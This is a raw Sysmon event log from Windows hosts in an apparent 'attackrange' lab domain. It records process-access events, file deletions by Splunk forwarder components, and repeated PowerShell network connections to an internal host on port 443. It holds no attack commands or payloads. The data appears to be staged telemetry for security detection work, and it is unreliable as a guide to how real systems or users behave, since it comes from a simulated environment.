13:09:39.150{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036495986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:39.150{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F13-6140-4A56-04000000C801}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036495985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:39.150{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F13-6140-4A56-04000000C801}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036495984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:39.144{B81B27B7-9F13-6140-4A56-04000000C801}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036495983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:39.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D13403CB914BB9D278DA1068571E93A9,SHA256=9E642B20CF7FE1A419ADC47386EF68473BE57FEB63EB2E9548AA21989603F5C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036495982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:39.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3EC346A9F7B31F926BDC8D0434D9647,SHA256=C293CE8873438ED1D1B47E21D301C8282CA7493E10EB219A1D827BFF3834E3A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036495994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:40.344{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83AB8549092F3AE4A84DE920416F4EBD,SHA256=7F646708E09AB0E3FF3A04D2B1DE32DA91E7436A2F626A0C40E04739197AABC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036495993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:40.164{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D13403CB914BB9D278DA1068571E93A9,SHA256=9E642B20CF7FE1A419ADC47386EF68473BE57FEB63EB2E9548AA21989603F5C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036495996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:41.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EEF8403C6F1D8ED68910B54F3AFA87C1,SHA256=98546DEBE3E6D332D9C5F33A9248D4DD7F0767BC4EE7CBAA793254C462AC5C87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036495995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:41.363{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51239318D98EBDA6B1C55E382AA377A7,SHA256=D0E309B9F41844E9F7F29C48F7DD2CFADC4616995EA5261E58281B550E46F18A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036495999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:12.457{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50355-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036495998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:11.758{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50354-false10.0.1.12-8000- 23542300x800000000000000036495997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:42.408{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B2DC42B1B5C156EB08612240752828F,SHA256=EC558AD26B0953288F9033DED49E497B3ADFDEB5E0894158EB7568F77ABD630E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:43.423{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32CA7A8ACC6354E803888CD865628F54,SHA256=5AD75D9557B00076D6FB9B5DF66D13D9F08AD6789880D366A277E5DAB27F69E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:44.441{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BECEEA17EC37CC7EF321AA49626F0CE5,SHA256=2C712CB35E6DDB265A9996BC3C61CCFD659154A97B41CA5099ABC720E9D3AA59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:44.322{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:44.322{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=FEB34DB2FF91F717ADC888CC2FFA7B48,SHA256=741CCA86117C34D20C80C476BA656341273CCF06B932B9BA8B4FC6F04BB7C353,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:45.474{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E252F4B9B07A88CE861E32E6D9314A0,SHA256=D097AEA9A09F9B0A3E6628D564E364AC20D3E59DC75C2A95515FDEFA357FE63D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:16.768{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50356-false10.0.1.12-8000- 23542300x800000000000000036496005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:46.489{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=320C40111564ED9CB46612FCD2B4FA50,SHA256=1B0A0D83AECB4225F26E8A3ABFAD8AA80D01E8A39CE7D709A8658AEF8BBD8685,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:47.856{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0A2B22191BE9CC8DC1AEEAB8310573AF,SHA256=D587D13CEE165DCD9E9D36547F5CD282109F642EB58630F09158F0A8ED0B3B2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:47.519{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB4E33CCC12B46E1AF47ADB06C68BA4C,SHA256=1DD2344C7FCD7C440FA0A5C775A7971C6F7BBA5B64837B6444A626AC1FD94EC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:18.467{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50357-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:48.536{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35AC790295AA4678A397939B92F42227,SHA256=ECAA9A68100C29C30397A175B40F3A08AE4B8FBB91768531E3A7E73E15CB43BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:49.570{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A3CF11B169B296F7CD9EF2468115909,SHA256=AA1989B9BDAE7AD7593C083957CF26191B0C51BA6A3E2E36A72ED67D1F37A138,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:50.584{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE84544590E4652C14551846011CE6D2,SHA256=D7C52419313445D6FC2BC477B3233A40B6AC78662758EB3275B4698CC248B8D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:51.631{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D6975B3A5968C535976BC36C956EA9,SHA256=8DF7770826F34F0F5C061FF87E84B6C3521F549F7CD7963CD147CB10211D6CD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:52.650{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA38D247E315176AB86CE160356BDDF1,SHA256=5B8045775584687B4BEA786E8E065311C1B747285693686666C899D18FA46F38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:53.830{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=22DABFB2308238E3A2B8037F8181D29F,SHA256=AAC33A3B24893F00990E30E257019F7752C7C32DB97A7D8B288C6D6EC18088AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:53.680{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=888BE66CFC342D207A57FFFF091ABDFA,SHA256=4A2EB87DD37223C804B6A36F9FF12BF75A1A7B6A2F8A25AD55DC1C7454629FAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:22.792{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50358-false10.0.1.12-8000- 354300x800000000000000036496019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:24.475{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50359-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:54.694{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=727F6F02958D47E8B1D481214621DB27,SHA256=73F55B05EC08DA122139FEB51D06A44FFC930BC2F5CD0B678B6D251180DABFEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:55.727{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76BF6DAD6224CECB53A591BF234D4C1B,SHA256=32D2EBA9405BBCCD03EDF4A5A0C732F1EC28D5FA7AD7B11F16BCCC1C6D038EED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:56.776{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=722AEB5E50B0860CE727A2D92D0DBE3F,SHA256=701406557D4FD79043A474CC6DF14AAB83A0A59032A3705B1FE78813CF86CF22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:56.230{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a2be979.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:57.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=662A8D25822AF86313284A7E33A809C2,SHA256=C4CFFCE81833E7642968780B61C1569295C8F301907EC65A732215BA27B72B8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:58.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDE36ABBFE8B8BDD39B9D8504315E7DE,SHA256=05222C45A84005EA99E21F62E81CF3E635E143517A509FA595486890EBEC5C58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E92103F17EFF0F47311B66D141E5D497,SHA256=F36412ACF3614BC91457D2441A0196197AE0AA14316AA8828D9530B3B7372B5B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.822{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A680CB8FEDA950F5CC1F18AD4D55F9B,SHA256=97F3C8CF084382621BBDA3288AC11D27A4744B67D56B2B28690BBF7C15970C33,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:09:59.590{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 